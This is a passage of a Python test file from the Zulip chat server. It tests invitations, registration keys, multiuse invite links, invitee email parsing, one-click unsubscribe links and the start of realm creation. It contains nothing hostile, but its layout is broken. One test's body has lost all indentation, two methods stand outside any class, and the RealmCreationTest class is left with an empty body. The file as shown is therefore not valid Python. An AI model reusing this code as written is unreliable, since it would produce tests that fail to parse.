        # Accept the first invite by creating the user with it.
        do_create_user(
            'foo@zulip.com',
            'password',
            self.user_profile.realm,
            'full name', 'short name',
            prereg_user=prereg_user,
        )

        accepted_invite = PreregistrationUser.objects.filter(
            email__iexact="foo@zulip.com", status=confirmation_settings.STATUS_ACTIVE)
        revoked_invites = PreregistrationUser.objects.filter(
            email__iexact="foo@zulip.com", status=confirmation_settings.STATUS_REVOKED)
        # If a user was invited more than once, when it accepts one invite and register
        # the others must be canceled.
        self.assertEqual(len(accepted_invite), 1)
        self.assertEqual(accepted_invite[0].id, prereg_user.id)

        expected_revoked_invites = set(invites.exclude(id=prereg_user.id))
        self.assertEqual(set(revoked_invites), expected_revoked_invites)
def test_confirmation_obj_not_exist_error(self) -> None:
""" Since the key is a param input by the user to the registration endpoint,
if it inserts an invalid value, the confirmation object won't be found. This
tests if, in that scenario, we handle the exception by redirecting the user to
the confirmation_link_expired_error page.
"""
email = self.nonreg_email('alice')
password = 'password'
realm = get_realm('zulip')
inviter = self.example_user('iago')
prereg_user = PreregistrationUser.objects.create(
email=email, referred_by=inviter, realm=realm)
confirmation_link = create_confirmation_link(prereg_user, Confirmation.USER_REGISTRATION)
registration_key = 'invalid_confirmation_key'
url = '/accounts/register/'
response = self.client_post(url, {'key': registration_key, 'from_confirmation': 1, 'full_nme': 'alice'})
self.assertEqual(response.status_code, 200)
self.assert_in_success_response(['The registration link has expired or is not valid.'], response)
registration_key = confirmation_link.split('/')[-1]
response = self.client_post(url, {'key': registration_key, 'from_confirmation': 1, 'full_nme': 'alice'})
self.assert_in_success_response(['We just need you to do one last thing.'], response)
response = self.submit_reg_form_for_user(email, password, key=registration_key)
self.assertEqual(response.status_code, 302)
def test_validate_email_not_already_in_realm(self) -> None:
    """After an invited email has completed registration, re-posting the
    same registration key should redirect to the login page (with the
    email pre-filled) instead of allowing a second registration.
    """
    email = self.nonreg_email('alice')
    password = 'password'
    realm = get_realm('zulip')
    inviter = self.example_user('iago')
    prereg_user = PreregistrationUser.objects.create(
        email=email, referred_by=inviter, realm=realm)

    confirmation_link = create_confirmation_link(prereg_user, Confirmation.USER_REGISTRATION)
    registration_key = confirmation_link.split('/')[-1]

    # First pass: complete registration normally.
    url = "/accounts/register/"
    self.client_post(url, {"key": registration_key, "from_confirmation": 1, "full_name": "alice"})
    self.submit_reg_form_for_user(email, password, key=registration_key)

    # Second pass with the same key: expect a redirect to login
    # carrying the (URL-quoted) email as a query parameter.
    url = "/accounts/register/"
    response = self.client_post(url, {"key": registration_key, "from_confirmation": 1, "full_name": "alice"})
    self.assertEqual(response.status_code, 302)
    self.assertEqual(response.url, reverse('django.contrib.auth.views.login') + '?email=' +
                     urllib.parse.quote_plus(email))
class InvitationsTestCase(InviteUserBase):
    """Tests for the invitation-management endpoints: listing invites
    (/json/invites), deleting them, and resending them, including the
    permission checks for members, administrators, and owners.
    """

    def test_do_get_user_invites(self) -> None:
        """do_get_user_invites should return the invites visible to the given
        user: 5 for the admin (4 PreregistrationUsers in the realm plus one
        multiuse invite), and only their own single invite for non-admins.
        Invites from other realms are excluded.
        """
        self.login('iago')
        user_profile = self.example_user("iago")
        hamlet = self.example_user('hamlet')
        othello = self.example_user('othello')

        prereg_user_one = PreregistrationUser(email="TestOne@zulip.com", referred_by=user_profile)
        prereg_user_one.save()
        prereg_user_two = PreregistrationUser(email="TestTwo@zulip.com", referred_by=user_profile)
        prereg_user_two.save()
        prereg_user_three = PreregistrationUser(email="TestThree@zulip.com", referred_by=hamlet)
        prereg_user_three.save()
        prereg_user_four = PreregistrationUser(email="TestFour@zulip.com", referred_by=othello)
        prereg_user_four.save()
        # An invite in another realm must not show up in the counts below.
        prereg_user_other_realm = PreregistrationUser(
            email="TestOne@zulip.com", referred_by=self.mit_user("sipbtest"))
        prereg_user_other_realm.save()

        multiuse_invite = MultiuseInvite.objects.create(referred_by=user_profile, realm=user_profile.realm)
        create_confirmation_link(multiuse_invite, Confirmation.MULTIUSE_INVITE)

        self.assertEqual(len(do_get_user_invites(user_profile)), 5)
        self.assertEqual(len(do_get_user_invites(hamlet)), 1)
        self.assertEqual(len(do_get_user_invites(othello)), 1)

    def test_successful_get_open_invitations(self) -> None:
        """
        A GET call to /json/invites returns all unexpired invitations.
        """
        realm = get_realm("zulip")
        # Guard against the settings attributes disappearing silently.
        days_to_activate = getattr(settings, 'INVITATION_LINK_VALIDITY_DAYS', "Wrong")
        active_value = getattr(confirmation_settings, 'STATUS_ACTIVE', "Wrong")
        self.assertNotEqual(days_to_activate, "Wrong")
        self.assertNotEqual(active_value, "Wrong")

        self.login('iago')
        user_profile = self.example_user("iago")

        # An open, unexpired invite: should appear in the response.
        prereg_user_one = PreregistrationUser(email="TestOne@zulip.com", referred_by=user_profile)
        prereg_user_one.save()
        # An expired invite: backdate invited_at past the validity window.
        expired_datetime = timezone_now() - datetime.timedelta(days=(days_to_activate+1))
        prereg_user_two = PreregistrationUser(email="TestTwo@zulip.com", referred_by=user_profile)
        prereg_user_two.save()
        PreregistrationUser.objects.filter(id=prereg_user_two.id).update(invited_at=expired_datetime)
        # An already-accepted invite (STATUS_ACTIVE): also excluded.
        prereg_user_three = PreregistrationUser(email="TestThree@zulip.com",
                                                referred_by=user_profile, status=active_value)
        prereg_user_three.save()

        hamlet = self.example_user('hamlet')
        othello = self.example_user('othello')

        multiuse_invite_one = MultiuseInvite.objects.create(referred_by=hamlet, realm=realm)
        create_confirmation_link(multiuse_invite_one, Confirmation.MULTIUSE_INVITE)

        multiuse_invite_two = MultiuseInvite.objects.create(referred_by=othello, realm=realm)
        create_confirmation_link(multiuse_invite_two, Confirmation.MULTIUSE_INVITE)
        # Expire othello's multiuse invite by backdating its Confirmation.
        confirmation = Confirmation.objects.last()
        confirmation.date_sent = expired_datetime
        confirmation.save()

        result = self.client_get("/json/invites")
        self.assertEqual(result.status_code, 200)
        self.assert_in_success_response(
            ["TestOne@zulip.com", hamlet.email],
            result)
        self.assert_not_in_success_response(
            ["TestTwo@zulip.com", "TestThree@zulip.com", "othello@zulip.com", othello.email],
            result)

    def test_successful_delete_invitation(self) -> None:
        """
        A DELETE call to /json/invites/<ID> should delete the invite and
        any scheduled invitation reminder emails.
        """
        self.login('iago')
        invitee = "DeleteMe@zulip.com"
        self.assert_json_success(self.invite(invitee, ['Denmark']))
        prereg_user = PreregistrationUser.objects.get(email=invitee)

        # Verify that the scheduled email exists.
        ScheduledEmail.objects.get(address__iexact=invitee,
                                   type=ScheduledEmail.INVITATION_REMINDER)
        result = self.client_delete('/json/invites/' + str(prereg_user.id))
        self.assertEqual(result.status_code, 200)
        # Deleting the same invite twice must report "No such invitation".
        error_result = self.client_delete('/json/invites/' + str(prereg_user.id))
        self.assert_json_error(error_result, "No such invitation")

        # The reminder email should have been unscheduled too.
        self.assertRaises(ScheduledEmail.DoesNotExist,
                          lambda: ScheduledEmail.objects.get(address__iexact=invitee,
                                                             type=ScheduledEmail.INVITATION_REMINDER))

    def test_successful_member_delete_invitation(self) -> None:
        """
        A DELETE call from a member account to /json/invites/<ID> should delete
        the invite and any scheduled invitation reminder emails.
        """
        user_profile = self.example_user('hamlet')
        self.login_user(user_profile)
        invitee = "DeleteMe@zulip.com"
        self.assert_json_success(self.invite(invitee, ['Denmark']))

        # Verify that the scheduled email exists.
        prereg_user = PreregistrationUser.objects.get(email=invitee,
                                                      referred_by=user_profile)
        ScheduledEmail.objects.get(address__iexact=invitee,
                                   type=ScheduledEmail.INVITATION_REMINDER)

        # Verify another non-admin can't delete
        result = self.api_delete(self.example_user("othello"),
                                 '/api/v1/invites/' + str(prereg_user.id))
        self.assert_json_error(result, "Must be an organization administrator")

        # Verify that the scheduled email still exists.
        prereg_user = PreregistrationUser.objects.get(email=invitee,
                                                      referred_by=user_profile)
        ScheduledEmail.objects.get(address__iexact=invitee,
                                   type=ScheduledEmail.INVITATION_REMINDER)

        # Verify deletion works.
        result = self.api_delete(user_profile,
                                 '/api/v1/invites/' + str(prereg_user.id))
        self.assertEqual(result.status_code, 200)

        result = self.api_delete(user_profile,
                                 '/api/v1/invites/' + str(prereg_user.id))
        self.assert_json_error(result, "No such invitation")

        self.assertRaises(ScheduledEmail.DoesNotExist,
                          lambda: ScheduledEmail.objects.get(address__iexact=invitee,
                                                             type=ScheduledEmail.INVITATION_REMINDER))

    def test_delete_owner_invitation(self) -> None:
        """Only an organization owner may delete an invitation that was sent
        with REALM_OWNER privileges; an administrator must be refused.
        """
        self.login('desdemona')
        owner = self.example_user('desdemona')
        invitee = "DeleteMe@zulip.com"
        self.assert_json_success(self.invite(invitee, ['Denmark'],
                                             invite_as=PreregistrationUser.INVITE_AS['REALM_OWNER']))
        prereg_user = PreregistrationUser.objects.get(email=invitee)
        # Iago is an admin but not an owner: deletion must fail.
        result = self.api_delete(self.example_user('iago'),
                                 '/api/v1/invites/' + str(prereg_user.id))
        self.assert_json_error(result, "Must be an organization owner")

        result = self.api_delete(owner, '/api/v1/invites/' + str(prereg_user.id))
        self.assert_json_success(result)
        result = self.api_delete(owner, '/api/v1/invites/' + str(prereg_user.id))
        self.assert_json_error(result, "No such invitation")
        self.assertRaises(ScheduledEmail.DoesNotExist,
                          lambda: ScheduledEmail.objects.get(address__iexact=invitee,
                                                             type=ScheduledEmail.INVITATION_REMINDER))

    def test_delete_multiuse_invite(self) -> None:
        """
        A DELETE call to /json/invites/multiuse<ID> should delete the
        multiuse_invite.
        """
        self.login('iago')

        zulip_realm = get_realm("zulip")
        multiuse_invite = MultiuseInvite.objects.create(referred_by=self.example_user("hamlet"), realm=zulip_realm)
        create_confirmation_link(multiuse_invite, Confirmation.MULTIUSE_INVITE)
        result = self.client_delete('/json/invites/multiuse/' + str(multiuse_invite.id))
        self.assertEqual(result.status_code, 200)
        self.assertIsNone(MultiuseInvite.objects.filter(id=multiuse_invite.id).first())
        # Test that trying to double-delete fails
        error_result = self.client_delete('/json/invites/multiuse/' + str(multiuse_invite.id))
        self.assert_json_error(error_result, "No such invitation")

        # Test deleting owner multiuse_invite.
        multiuse_invite = MultiuseInvite.objects.create(referred_by=self.example_user("desdemona"), realm=zulip_realm,
                                                        invited_as=PreregistrationUser.INVITE_AS['REALM_OWNER'])
        create_confirmation_link(multiuse_invite, Confirmation.MULTIUSE_INVITE)
        # An admin (iago) may not delete an owner-level multiuse invite.
        error_result = self.client_delete('/json/invites/multiuse/' + str(multiuse_invite.id))
        self.assert_json_error(error_result, 'Must be an organization owner')

        self.login('desdemona')
        result = self.client_delete('/json/invites/multiuse/' + str(multiuse_invite.id))
        self.assert_json_success(result)
        self.assertIsNone(MultiuseInvite.objects.filter(id=multiuse_invite.id).first())

        # Test deleting multiuse invite from another realm
        mit_realm = get_realm("zephyr")
        multiuse_invite_in_mit = MultiuseInvite.objects.create(referred_by=self.mit_user("sipbtest"), realm=mit_realm)
        create_confirmation_link(multiuse_invite_in_mit, Confirmation.MULTIUSE_INVITE)
        error_result = self.client_delete('/json/invites/multiuse/' + str(multiuse_invite_in_mit.id))
        self.assert_json_error(error_result, "No such invitation")

    def test_successful_resend_invitation(self) -> None:
        """
        A POST call to /json/invites/<ID>/resend should send an invitation reminder email
        and delete any scheduled invitation reminder email.
        """
        self.login('iago')
        invitee = "resend_me@zulip.com"

        self.assert_json_success(self.invite(invitee, ['Denmark']))
        prereg_user = PreregistrationUser.objects.get(email=invitee)

        # Verify and then clear from the outbox the original invite email
        self.check_sent_emails([invitee], custom_from_name="Zulip")
        from django.core.mail import outbox
        outbox.pop()

        # Verify that the scheduled email exists.
        scheduledemail_filter = ScheduledEmail.objects.filter(
            address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER)
        self.assertEqual(scheduledemail_filter.count(), 1)
        original_timestamp = scheduledemail_filter.values_list('scheduled_timestamp', flat=True)

        # Resend invite
        result = self.client_post('/json/invites/' + str(prereg_user.id) + '/resend')
        self.assertEqual(ScheduledEmail.objects.filter(
            address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER).count(), 1)

        # Check that we have exactly one scheduled email, and that it is different
        self.assertEqual(scheduledemail_filter.count(), 1)
        self.assertNotEqual(original_timestamp,
                            scheduledemail_filter.values_list('scheduled_timestamp', flat=True))

        self.assertEqual(result.status_code, 200)
        # Resending a nonexistent invite must fail cleanly.
        error_result = self.client_post('/json/invites/' + str(9999) + '/resend')
        self.assert_json_error(error_result, "No such invitation")

        self.check_sent_emails([invitee], custom_from_name="Zulip")

    def test_successful_member_resend_invitation(self) -> None:
        """A POST call from a member account to /json/invites/<ID>/resend
        should send an invitation reminder email and delete any
        scheduled invitation reminder email if they sent the invite.
        """
        self.login('hamlet')
        user_profile = self.example_user('hamlet')
        invitee = "resend_me@zulip.com"
        self.assert_json_success(self.invite(invitee, ['Denmark']))
        # Verify hamlet has only one invitation (Member can resend invitations only sent by him).
        invitation = PreregistrationUser.objects.filter(referred_by=user_profile)
        self.assertEqual(len(invitation), 1)
        prereg_user = PreregistrationUser.objects.get(email=invitee)

        # Verify and then clear from the outbox the original invite email
        self.check_sent_emails([invitee], custom_from_name="Zulip")
        from django.core.mail import outbox
        outbox.pop()

        # Verify that the scheduled email exists.
        scheduledemail_filter = ScheduledEmail.objects.filter(
            address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER)
        self.assertEqual(scheduledemail_filter.count(), 1)
        original_timestamp = scheduledemail_filter.values_list('scheduled_timestamp', flat=True)

        # Resend invite
        result = self.client_post('/json/invites/' + str(prereg_user.id) + '/resend')
        self.assertEqual(ScheduledEmail.objects.filter(
            address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER).count(), 1)

        # Check that we have exactly one scheduled email, and that it is different
        self.assertEqual(scheduledemail_filter.count(), 1)
        self.assertNotEqual(original_timestamp,
                            scheduledemail_filter.values_list('scheduled_timestamp', flat=True))

        self.assertEqual(result.status_code, 200)
        error_result = self.client_post('/json/invites/' + str(9999) + '/resend')
        self.assert_json_error(error_result, "No such invitation")

        self.check_sent_emails([invitee], custom_from_name="Zulip")

        # A different member (othello) must not be able to resend an
        # invitation that hamlet sent.
        self.logout()
        self.login("othello")
        invitee = "TestOne@zulip.com"
        prereg_user_one = PreregistrationUser(email=invitee, referred_by=user_profile)
        prereg_user_one.save()
        prereg_user = PreregistrationUser.objects.get(email=invitee)
        error_result = self.client_post('/json/invites/' + str(prereg_user.id) + '/resend')
        self.assert_json_error(error_result, "Must be an organization administrator")

    def test_resend_owner_invitation(self) -> None:
        """Only an organization owner may resend an invitation that grants
        REALM_OWNER privileges; resending replaces the scheduled reminder.
        """
        self.login("desdemona")

        invitee = "resend_owner@zulip.com"
        self.assert_json_success(self.invite(invitee, ['Denmark'],
                                             invite_as=PreregistrationUser.INVITE_AS['REALM_OWNER']))
        self.check_sent_emails([invitee], custom_from_name="Zulip")
        scheduledemail_filter = ScheduledEmail.objects.filter(
            address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER)
        self.assertEqual(scheduledemail_filter.count(), 1)
        original_timestamp = scheduledemail_filter.values_list('scheduled_timestamp', flat=True)

        # Test only organization owners can resend owner invitation.
        self.login('iago')
        prereg_user = PreregistrationUser.objects.get(email=invitee)
        error_result = self.client_post('/json/invites/' + str(prereg_user.id) + '/resend')
        self.assert_json_error(error_result, "Must be an organization owner")

        self.login('desdemona')
        result = self.client_post('/json/invites/' + str(prereg_user.id) + '/resend')
        self.assert_json_success(result)

        self.assertEqual(ScheduledEmail.objects.filter(
            address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER).count(), 1)

        # Check that we have exactly one scheduled email, and that it is different
        self.assertEqual(scheduledemail_filter.count(), 1)
        self.assertNotEqual(original_timestamp,
                            scheduledemail_filter.values_list('scheduled_timestamp', flat=True))

    def test_accessing_invites_in_another_realm(self) -> None:
        """Resending or deleting an invitation that belongs to another realm
        must be reported as "No such invitation" rather than leaking its
        existence.
        """
        inviter = UserProfile.objects.exclude(realm=get_realm('zulip')).first()
        prereg_user = PreregistrationUser.objects.create(
            email='email', referred_by=inviter, realm=inviter.realm)
        self.login('iago')
        error_result = self.client_post('/json/invites/' + str(prereg_user.id) + '/resend')
        self.assert_json_error(error_result, "No such invitation")
        error_result = self.client_delete('/json/invites/' + str(prereg_user.id))
        self.assert_json_error(error_result, "No such invitation")

    def test_prereg_user_status(self) -> None:
        """The PreregistrationUser's status should stay at its initial value
        (0) through the prefill step and flip to STATUS_ACTIVE once the
        registration form is actually submitted.
        """
        email = self.nonreg_email("alice")
        password = "password"
        realm = get_realm('zulip')

        inviter = UserProfile.objects.first()
        prereg_user = PreregistrationUser.objects.create(
            email=email, referred_by=inviter, realm=realm)

        confirmation_link = create_confirmation_link(prereg_user, Confirmation.USER_REGISTRATION)
        registration_key = confirmation_link.split('/')[-1]

        result = self.client_post(
            "/accounts/register/",
            {"key": registration_key,
             "from_confirmation": "1",
             "full_name": "alice"})
        self.assertEqual(result.status_code, 200)
        confirmation = Confirmation.objects.get(confirmation_key=registration_key)
        prereg_user = confirmation.content_object
        # Status is still the default (0) before the form is submitted.
        self.assertEqual(prereg_user.status, 0)

        result = self.submit_reg_form_for_user(email, password, key=registration_key)
        self.assertEqual(result.status_code, 302)
        prereg_user = PreregistrationUser.objects.get(
            email=email, referred_by=inviter, realm=realm)
        self.assertEqual(prereg_user.status, confirmation_settings.STATUS_ACTIVE)
        user = get_user_by_delivery_email(email, realm)
        self.assertIsNotNone(user)
        self.assertEqual(user.delivery_email, email)
class InviteeEmailsParserTests(TestCase):
    """Tests for get_invitee_emails_set: parsing a raw invitee string
    (comma-, newline-, or "Name <addr>"-formatted) into a set of
    stripped email addresses.
    """

    def setUp(self) -> None:
        super().setUp()
        # Three distinct addresses shared by all the parsing tests below.
        self.email1 = "email1@zulip.com"
        self.email2 = "email2@zulip.com"
        self.email3 = "email3@zulip.com"

    def test_if_emails_separated_by_commas_are_parsed_and_striped_correctly(self) -> None:
        # Comma-separated input with stray whitespace around the commas.
        raw_input = f"{self.email1} ,{self.email2}, {self.email3}"
        self.assertEqual(get_invitee_emails_set(raw_input),
                         {self.email1, self.email2, self.email3})

    def test_if_emails_separated_by_newlines_are_parsed_and_striped_correctly(self) -> None:
        # Newline-separated input with leading/trailing whitespace.
        raw_input = f"{self.email1}\n {self.email2}\n {self.email3} "
        self.assertEqual(get_invitee_emails_set(raw_input),
                         {self.email1, self.email2, self.email3})

    def test_if_emails_from_email_client_separated_by_newlines_are_parsed_correctly(self) -> None:
        # "Display Name <address>" style, as pasted from an email client.
        raw_input = f"Email One <{self.email1}>\nEmailTwo<{self.email2}>\nEmail Three<{self.email3}>"
        self.assertEqual(get_invitee_emails_set(raw_input),
                         {self.email1, self.email2, self.email3})

    def test_if_emails_in_mixed_style_are_parsed_correctly(self) -> None:
        # A mixture of all of the formats above in one string.
        raw_input = f"Email One <{self.email1}>,EmailTwo<{self.email2}>\n{self.email3}"
        self.assertEqual(get_invitee_emails_set(raw_input),
                         {self.email1, self.email2, self.email3})
class MultiuseInviteTest(ZulipTestCase):
    """Tests for multiuse invitation links: generating them, registering
    through them (valid/expired/invalid), stream subscriptions attached
    to them, and the /json/invites/multiuse API.
    """

    def setUp(self) -> None:
        super().setUp()
        self.realm = get_realm('zulip')
        # Require invitations so that registration must go through a link.
        self.realm.invite_required = True
        self.realm.save()

    def generate_multiuse_invite_link(self, streams: Optional[List[Stream]]=None,
                                      date_sent: Optional[datetime.datetime]=None) -> str:
        """Create a MultiuseInvite (optionally restricted to streams and
        backdated via date_sent) and return its confirmation URL.
        """
        invite = MultiuseInvite(realm=self.realm, referred_by=self.example_user("iago"))
        invite.save()

        if streams is not None:
            invite.streams.set(streams)

        if date_sent is None:
            date_sent = timezone_now()
        key = generate_key()
        Confirmation.objects.create(content_object=invite, date_sent=date_sent,
                                    confirmation_key=key, type=Confirmation.MULTIUSE_INVITE)

        return confirmation_url(key, self.realm, Confirmation.MULTIUSE_INVITE)

    def check_user_able_to_register(self, email: str, invite_link: str) -> None:
        """Drive a full registration for `email` through `invite_link` and
        assert each step succeeds; pops the confirmation email from the
        outbox when done.
        """
        password = "password"

        result = self.client_post(invite_link, {'email': email})
        self.assertEqual(result.status_code, 302)
        self.assertTrue(result["Location"].endswith(
            f"/accounts/send_confirm/{email}"))
        result = self.client_get(result["Location"])
        self.assert_in_response("Check your email so we can get started.", result)

        confirmation_url = self.get_confirmation_url_from_outbox(email)
        result = self.client_get(confirmation_url)
        self.assertEqual(result.status_code, 200)

        result = self.submit_reg_form_for_user(email, password)
        self.assertEqual(result.status_code, 302)

        # Drop the confirmation email so later calls see a clean outbox.
        from django.core.mail import outbox
        outbox.pop()

    def test_valid_multiuse_link(self) -> None:
        """A still-valid multiuse link can be used by several users."""
        email1 = self.nonreg_email("test")
        email2 = self.nonreg_email("test1")
        email3 = self.nonreg_email("alice")
        # One day inside the validity window.
        date_sent = timezone_now() - datetime.timedelta(days=settings.INVITATION_LINK_VALIDITY_DAYS - 1)
        invite_link = self.generate_multiuse_invite_link(date_sent=date_sent)

        self.check_user_able_to_register(email1, invite_link)
        self.check_user_able_to_register(email2, invite_link)
        self.check_user_able_to_register(email3, invite_link)

    def test_expired_multiuse_link(self) -> None:
        """A link exactly at the validity limit should be rejected."""
        email = self.nonreg_email('newuser')
        date_sent = timezone_now() - datetime.timedelta(days=settings.INVITATION_LINK_VALIDITY_DAYS)
        invite_link = self.generate_multiuse_invite_link(date_sent=date_sent)
        result = self.client_post(invite_link, {'email': email})

        self.assertEqual(result.status_code, 200)
        self.assert_in_response("The confirmation link has expired or been deactivated.", result)

    def test_invalid_multiuse_link(self) -> None:
        """A syntactically invalid key yields the malformed-link page."""
        email = self.nonreg_email('newuser')
        invite_link = "/join/invalid_key/"
        result = self.client_post(invite_link, {'email': email})

        self.assertEqual(result.status_code, 200)
        self.assert_in_response("Whoops. The confirmation link is malformed.", result)

    def test_invalid_multiuse_link_in_open_realm(self) -> None:
        """In an open realm (invite not required), even an invalid key still
        lets the user register, since no invitation is needed.
        """
        self.realm.invite_required = False
        self.realm.save()

        email = self.nonreg_email('newuser')
        invite_link = "/join/invalid_key/"

        with patch('zerver.views.registration.get_realm_from_request', return_value=self.realm):
            with patch('zerver.views.registration.get_realm', return_value=self.realm):
                self.check_user_able_to_register(email, invite_link)

    def test_multiuse_link_with_specified_streams(self) -> None:
        """Users registering through a stream-restricted multiuse link get
        subscribed to exactly those streams.
        """
        name1 = "newuser"
        name2 = "bob"
        email1 = self.nonreg_email(name1)
        email2 = self.nonreg_email(name2)

        stream_names = ["Rome", "Scotland", "Venice"]
        streams = [get_stream(stream_name, self.realm) for stream_name in stream_names]
        invite_link = self.generate_multiuse_invite_link(streams=streams)
        self.check_user_able_to_register(email1, invite_link)
        self.check_user_subscribed_only_to_streams(name1, streams)

        stream_names = ["Rome", "Verona"]
        streams = [get_stream(stream_name, self.realm) for stream_name in stream_names]
        invite_link = self.generate_multiuse_invite_link(streams=streams)
        self.check_user_able_to_register(email2, invite_link)
        self.check_user_subscribed_only_to_streams(name2, streams)

    def test_create_multiuse_link_api_call(self) -> None:
        """POST /json/invites/multiuse returns a usable invite link."""
        self.login('iago')

        result = self.client_post('/json/invites/multiuse')
        self.assert_json_success(result)

        invite_link = result.json()["invite_link"]
        self.check_user_able_to_register(self.nonreg_email("test"), invite_link)

    def test_create_multiuse_link_with_specified_streams_api_call(self) -> None:
        """The stream_ids parameter restricts the resulting subscriptions."""
        self.login('iago')
        stream_names = ["Rome", "Scotland", "Venice"]
        streams = [get_stream(stream_name, self.realm) for stream_name in stream_names]
        stream_ids = [stream.id for stream in streams]

        result = self.client_post('/json/invites/multiuse',
                                  {"stream_ids": ujson.dumps(stream_ids)})
        self.assert_json_success(result)

        invite_link = result.json()["invite_link"]
        self.check_user_able_to_register(self.nonreg_email("test"), invite_link)
        self.check_user_subscribed_only_to_streams("test", streams)

    def test_only_admin_can_create_multiuse_link_api_call(self) -> None:
        self.login('iago')
        # Only admins should be able to create multiuse invites even if
        # invite_by_admins_only is set to False.
        self.realm.invite_by_admins_only = False
        self.realm.save()

        result = self.client_post('/json/invites/multiuse')
        self.assert_json_success(result)

        invite_link = result.json()["invite_link"]
        self.check_user_able_to_register(self.nonreg_email("test"), invite_link)

        # A non-admin member must be refused.
        self.login('hamlet')
        result = self.client_post('/json/invites/multiuse')
        self.assert_json_error(result, "Must be an organization administrator")

    def test_multiuse_link_for_inviting_as_owner(self) -> None:
        """Only an owner may create an owner-level multiuse invite."""
        self.login('iago')
        result = self.client_post('/json/invites/multiuse',
                                  {"invite_as": ujson.dumps(PreregistrationUser.INVITE_AS['REALM_OWNER'])})
        self.assert_json_error(result, "Must be an organization owner")

        self.login('desdemona')
        result = self.client_post('/json/invites/multiuse',
                                  {"invite_as": ujson.dumps(PreregistrationUser.INVITE_AS['REALM_OWNER'])})
        self.assert_json_success(result)

        invite_link = result.json()["invite_link"]
        self.check_user_able_to_register(self.nonreg_email("test"), invite_link)

    def test_create_multiuse_link_invalid_stream_api_call(self) -> None:
        """A nonexistent stream id is rejected with a clear error."""
        self.login('iago')
        result = self.client_post('/json/invites/multiuse',
                                  {"stream_ids": ujson.dumps([54321])})
        self.assert_json_error(result, "Invalid stream id 54321. No invites were sent.")
class EmailUnsubscribeTests(ZulipTestCase):
    """Tests for the one-click email-unsubscribe endpoints
    (/accounts/unsubscribe/<type>/<token>), which work while logged out.
    """

    def test_error_unsubscribe(self) -> None:
        """Invalid tokens and unknown email types render an error page."""

        # An invalid unsubscribe token "test123" produces an error.
        result = self.client_get('/accounts/unsubscribe/missed_messages/test123')
        self.assert_in_response('Unknown email unsubscribe request', result)

        # An unknown message type "fake" produces an error.
        user_profile = self.example_user('hamlet')
        unsubscribe_link = one_click_unsubscribe_link(user_profile, "fake")
        result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)
        self.assert_in_response('Unknown email unsubscribe request', result)

    def test_missedmessage_unsubscribe(self) -> None:
        """
        We provide one-click unsubscribe links in missed message
        e-mails that you can click even when logged out to update your
        email notification settings.
        """
        user_profile = self.example_user('hamlet')
        user_profile.enable_offline_email_notifications = True
        user_profile.save()

        unsubscribe_link = one_click_unsubscribe_link(user_profile,
                                                      "missed_messages")
        result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)

        self.assertEqual(result.status_code, 200)
        user_profile.refresh_from_db()
        self.assertFalse(user_profile.enable_offline_email_notifications)

    def test_welcome_unsubscribe(self) -> None:
        """
        We provide one-click unsubscribe links in welcome e-mails that you can
        click even when logged out to stop receiving them.
        """
        user_profile = self.example_user('hamlet')
        # Simulate a new user signing up, which enqueues 2 welcome e-mails.
        enqueue_welcome_emails(user_profile)
        self.assertEqual(2, ScheduledEmail.objects.filter(users=user_profile).count())

        # Simulate unsubscribing from the welcome e-mails.
        unsubscribe_link = one_click_unsubscribe_link(user_profile, "welcome")
        result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)

        # The welcome email jobs are no longer scheduled.
        self.assertEqual(result.status_code, 200)
        self.assertEqual(0, ScheduledEmail.objects.filter(users=user_profile).count())

    def test_digest_unsubscribe(self) -> None:
        """
        We provide one-click unsubscribe links in digest e-mails that you can
        click even when logged out to stop receiving them.

        Unsubscribing from these emails also dequeues any digest email jobs that
        have been queued.
        """
        user_profile = self.example_user('hamlet')
        self.assertTrue(user_profile.enable_digest_emails)

        # Enqueue a fake digest email.
        context = {'name': '', 'realm_uri': '', 'unread_pms': [], 'hot_conversations': [],
                   'new_users': [], 'new_streams': {'plain': []}, 'unsubscribe_link': ''}
        send_future_email('zerver/emails/digest', user_profile.realm,
                          to_user_ids=[user_profile.id], context=context)

        self.assertEqual(1, ScheduledEmail.objects.filter(users=user_profile).count())

        # Simulate unsubscribing from digest e-mails.
        unsubscribe_link = one_click_unsubscribe_link(user_profile, "digest")
        result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)

        # The setting is toggled off, and scheduled jobs have been removed.
        self.assertEqual(result.status_code, 200)
        # Circumvent user_profile caching.

        user_profile.refresh_from_db()
        self.assertFalse(user_profile.enable_digest_emails)
        self.assertEqual(0, ScheduledEmail.objects.filter(users=user_profile).count())

    def test_login_unsubscribe(self) -> None:
        """
        We provide one-click unsubscribe links in login
        e-mails that you can click even when logged out to update your
        email notification settings.
        """
        user_profile = self.example_user('hamlet')
        user_profile.enable_login_emails = True
        user_profile.save()

        unsubscribe_link = one_click_unsubscribe_link(user_profile, "login")
        result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)

        self.assertEqual(result.status_code, 200)
        user_profile.refresh_from_db()
        self.assertFalse(user_profile.enable_login_emails)
class RealmCreationTest(ZulipTestCase):
@override_settings(OPEN_REALM_CREATION=True)
def check_able_to_create_realm(self, email: str, password: str="test") -> None:
    """Shared driver: create a new 'zuliptest' realm via /new/ with the
    given email/password, then verify the realm, the owner user, the
    realm defaults, and the welcome/signup messages.
    """
    notification_bot = get_system_bot(settings.NOTIFICATION_BOT)
    signups_stream, _ = create_stream_if_needed(notification_bot.realm, 'signups')

    string_id = "zuliptest"
    # Make sure the realm does not exist
    with self.assertRaises(Realm.DoesNotExist):
        get_realm(string_id)

    # Create new realm with the email
    result = self.client_post('/new/', {'email': email})
    self.assertEqual(result.status_code, 302)
    self.assertTrue(result["Location"].endswith(
        f"/accounts/new/send_confirm/{email}"))
    result = self.client_get(result["Location"])
    self.assert_in_response("Check your email so we can get started.", result)

    # Visit the confirmation link.
    confirmation_url = self.get_confirmation_url_from_outbox(email)
    result = self.client_get(confirmation_url)
    self.assertEqual(result.status_code, 200)

    result = self.submit_reg_form_for_user(email, password, realm_subdomain=string_id)
    self.assertEqual(result.status_code, 302)
